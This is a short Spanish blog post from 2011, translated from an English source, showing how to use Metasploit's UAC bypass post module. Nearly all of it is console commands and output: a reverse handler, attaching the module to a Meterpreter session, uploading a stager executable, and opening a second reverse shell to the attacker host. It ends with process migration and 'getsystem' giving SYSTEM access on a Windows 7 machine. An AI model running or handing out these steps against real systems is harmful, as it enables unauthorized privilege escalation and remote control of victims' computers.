jueves, 6 de enero de 2011

Bypass de Windows UAC en Metasploit

El bypass de Windows UAC ha sido incluido hoy en Metasploit Framework. Es un poco diferente al script tradicional. En lugar de interactuar con meterpreter y ejecutar los comandos desde la shell de meterpreter, es necesario utilizar los nuevos módulos post. Veamos como se hace:

[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 ->  172.16.32.130:1989) at Thu Jan 06  12:40:35 -0500 2011

msf exploit(handler) > use post/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     no        Host
RPORT    4444             no        Port
SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1

msf post(bypassuac) > exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
meterpreter >

…obtenemos acceso como system (vía técnica 1).

meterpreter > sysinfo
Computer: JOHN-DEV-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x64 (Current Process is WOW64)
Language: en_US
meterpreter >

*Traducido de http://www.secmaniac.com/january-2011/windows-uac-bypass-now-in-metasploit/
Publicado por DarkOperator en 10:20

No hay comentarios:

Los comentarios nuevos no están permitidos.

Suscribirse a: Enviar comentarios (Atom)